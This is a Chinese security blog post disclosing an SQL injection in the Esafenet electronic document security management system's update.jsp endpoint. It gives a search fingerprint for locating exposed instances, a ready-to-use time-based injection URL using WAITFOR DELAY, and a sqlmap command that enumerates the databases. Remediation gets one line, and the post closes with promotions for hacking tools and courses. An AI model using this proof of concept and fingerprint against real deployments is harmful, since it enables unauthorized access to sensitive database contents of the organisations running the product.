SQL注入漏洞

如果文章对你有帮助,欢迎关注、点赞、收藏一键三连支持以下哦!
想要一起交流学习的小伙伴可以加zkaq222(备注CSDN,不备注通不过哦)进入学习,共同学习进步

目录

0x01 漏洞介绍

0x02 影响产品

0x03 语法特征

0x04 漏洞复现

0x05 漏洞修复建议


0x01 漏洞介绍


亿赛通电子文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品之一,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。该漏洞存在与/update接口下,flag对输入的数据没有进行严格的过滤而导致SQL注入,攻击者可以利用该漏洞获取数据库敏感信息。


0x02 影响产品

1.亿赛通电子文档安全管理系统

0x03 语法特征

1.app="亿赛通-电子文档安全管理系统"

0x04 漏洞复现


页面
 

SQL注入漏洞_第1张图片


POC

CDGServer3/workflowE/useractivate/update.jsp?flag=1&ids=1,3);WAITFOR%20DELAY%20%270:0:值%27--

修改值的大小 对应延迟时间
 

SQL注入漏洞_第2张图片

SQL注入漏洞_第3张图片

 
  
python3 sqlmap.py -u "https://xxxxx/CDGServer3/workflowE/useractiv

ate/update.jsp?flag=1&ids=1,3)" --batch --dbs

SQL注入漏洞_第4张图片

0x05 漏洞修复建议

设置防火墙规则,过滤漏洞相关的敏感链接监测

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

图片

没看够~?欢迎关注!

 SQL注入漏洞_第5张图片

渗透工具

SQL注入漏洞_第6张图片

技术文档、书籍

SQL注入漏洞_第7张图片 SQL注入漏洞_第8张图片

SQL注入漏洞_第9张图片

面试题

帮助你在面试中脱颖而出

SQL注入漏洞_第10张图片

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

SQL注入漏洞_第11张图片 

SQL注入漏洞_第12张图片

你可能感兴趣的:(网络安全,sql)